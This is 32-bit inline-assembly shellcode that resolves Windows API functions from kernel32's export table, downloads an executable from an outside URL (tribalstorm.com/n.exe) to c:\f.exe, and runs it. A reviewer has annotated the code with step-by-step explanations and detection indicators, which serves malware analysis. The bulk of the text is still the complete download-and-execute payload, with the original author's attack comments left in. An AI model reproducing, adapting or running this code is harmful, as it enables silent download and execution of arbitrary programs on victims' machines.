// Analysis notes (review): 32-bit MSVC inline-assembly shellcode of the
// "download and execute" type. Reading the code below, it:
//   1. scans memory downward from a fixed address for an "MZ" image header
//      (the author's comment says the target is kernel32.dll),
//   2. walks that image's export tables to resolve GetProcAddress,
//      LoadLibraryA and WinExec by name,
//   3. loads urlmon.dll and resolves URLDownloadToFileA,
//   4. downloads the URL embedded in `string` to the embedded file path,
//   5. runs the downloaded file with WinExec.
// Indicators visible in this listing: the path c:\f.exe and the URL
// http://www.tribalstorm.com/n.exe. Behaviour worth alerting on: a process
// that does not normally use urlmon.dll loading it, calling URLDownloadToFileA,
// and then launching an executable it just wrote to the root of a drive.
// NOTE(review): the line breaks were reconstructed from a collapsed paste, and
// the closing brace of the __asm block is not part of this excerpt.

// my vars..
// /20 /30 //35 //3b   (author's offset notes; their meaning is not shown here)
//
// Layout of the blob, as consumed by the code below:
//   3 leading bytes, skipped by `add edx, 0x3`
//   three entries of <length byte><API name><NUL>
//   two NUL bytes (an empty entry ends the resolve loop), then one byte (0x3b)
//   NUL-terminated strings: DLL name, API name, local file path, URL
// The code writes each resolved address over the last four bytes of the
// matching entry, so the blob has to live in writable memory.
char *string = "\x2c\x20\x35\x0eGetProcAddress\0\x0cLoadLibraryA\0\x07WinExec\0\0\0\x3burlmon.dll\0URLDownloadToFileA\0c:\\f.exe\0http://www.tribalstorm.com/n.exe";

__asm {
    // u will need a slider..
    // edx needs to be set to string..
    mov edx, string
    call jumppoint                  // pushes the address of jumppoint; no matching pop is visible
jumppoint:
    mov ebx,77F00000h               // fixed scan start address
    // we search for some stuff in kernel32.dll
    // Steps ebx down one byte at a time until the dword there is 4D 5A 90 00
    // ("MZ" plus the next two header bytes). The scan has no lower bound.
    // NOTE(review): the fixed start address presumably matches specific OS
    // builds only; confirm before drawing conclusions about affected systems.
loop2:
    cmp dword ptr [ebx],905A4Dh
    je jump3
    dec ebx
    jmp loop2
jump3:
    // we've found the stuff and copy some data
    // ebx = image base. The offsets below follow the PE32 layout.
    // func 1
    mov esi,dword ptr [ebx+3Ch]     // e_lfanew: offset of the PE header
    add esi,ebx
    // func 2
    mov esi,dword ptr [esi+78h]     // RVA of the export directory
    add esi,ebx                     // esi = export directory
    // func 3
    mov edi,dword ptr [esi+20h]     // AddressOfNames RVA
    add edi,ebx                     // edi = cursor into the name-pointer array
    // func 4
    mov ecx,dword ptr [esi+14h]     // count used by `loop` (offset 14h is NumberOfFunctions)
    push esi // 77ED3630            // save export directory (hex value: author's debug note)
    xor eax,eax                     // eax = index of the export name being tested
    add edx, 0x3                    // skip the 3 leading bytes; edx -> first length byte

    // The "seh" in the label names is the author's wording; the loop below
    // walks export names, not an exception-handler list.
loopseh:
    push edi // 77ED4340
    push ecx // 0000033A
    // loop seh list
    mov edi,dword ptr [edi]         // RVA of the current export name
    add edi,ebx // ebx = 77E80000   // edi = export name string
    //lea esi,
    mov esi,edx // edx = 00422FDC
    add esi, 1                      // esi = wanted name, just past its length byte
    // we've loaded all we need
    cmp byte ptr [esi], 0x00        // empty entry: every wanted name is resolved
    je startexecute                 // leaves the two values pushed above on the stack
    xor ecx,ecx
    // we load functions and their addresses from the v table
    mov cl, byte ptr [edx]          // ecx = length byte of the wanted name
    repe cmps byte ptr [esi],byte ptr [edi]
    pop ecx                         // pop does not change flags, so the compare result survives
    pop edi
    je readseh                      // names matched
    add edi,4                       // next name pointer
    inc eax
    loop loopseh

    // Match: map name index -> ordinal -> function address and store it.
readseh:
    nop
    inc esi                         // step past the name's NUL to the next length byte
    mov edx, esi // store where are in the string
    pop esi                         // esi = export directory saved earlier
    push edx // n
    push edi
    push ebx
    push eax
    mov edx,dword ptr [esi+24h]     // AddressOfNameOrdinals RVA
    add edx,ebx
    shl eax,1                       // ordinals are 16-bit
    add eax,edx
    xor ecx,ecx
    mov cx,word ptr [eax]           // ecx = ordinal for this name
    mov eax,dword ptr [esi+1Ch]     // AddressOfFunctions RVA
    add eax,ebx
    shl ecx,2                       // function RVAs are 32-bit
    add eax,ecx
    mov edx,dword ptr [eax]
    add edx,ebx                     // edx = resolved function address
    pop eax
    pop ebx
    pop edi
    pop ecx                         // ecx = blob position pushed above as edx
    mov [ecx-0x4], edx              // overwrite the tail of the matched name with the address
    mov edx, ecx                    // continue with the next wanted name
    push esi                        // re-save export directory for the next match
    jmp loopseh                     // ecx now holds a pointer, not the original count

    // Resolved slots relative to esi, as used below:
    //   [esi-0x1d] GetProcAddress, [esi-0x0f] LoadLibraryA, [esi-0x06] WinExec
    // The offsets follow from the entry lengths in `string`.
startexecute:
    nop
    add ecx, 2                      // ecx is expected to equal edx here; moves to the 0x3b byte
    mov esi, ecx                    // keep the base in esi for the calls below
    // loadlibrary urlmon
    lea eax, [ecx+1h]               // "urlmon.dll"
    push eax
    mov ebx, dword ptr [ecx-0x0f]
    call ebx
    // eax = handle to urlmon
    mov dword ptr[esi-0x0f], eax    // module handle replaces the LoadLibraryA slot
    nop
    lea edx, [esi+0x0c]             // "URLDownloadToFileA"
    push edx
    push [esi-0x0f]                 // urlmon module handle
    mov ebx, dword ptr [esi-0x1d]
    call ebx
    // elvis found the address :>
    // Five arguments are pushed for the resolved function: 0, URL, file path, 0, 0.
    push 0
    push 0
    lea ebx, [esi+0x1f]             // "c:\f.exe"
    push ebx
    lea ebx, [esi+0x28]             // the embedded URL
    push ebx
    push 0
    call eax
    nop
    // sven has the file..
    // The return value of the download call is not checked before execution.
    push 1                          // second argument to WinExec
    lea ebx, [esi+0x1f]             // "c:\f.exe"
    push ebx
    call [esi-0x06]
    nop
    // Game Over..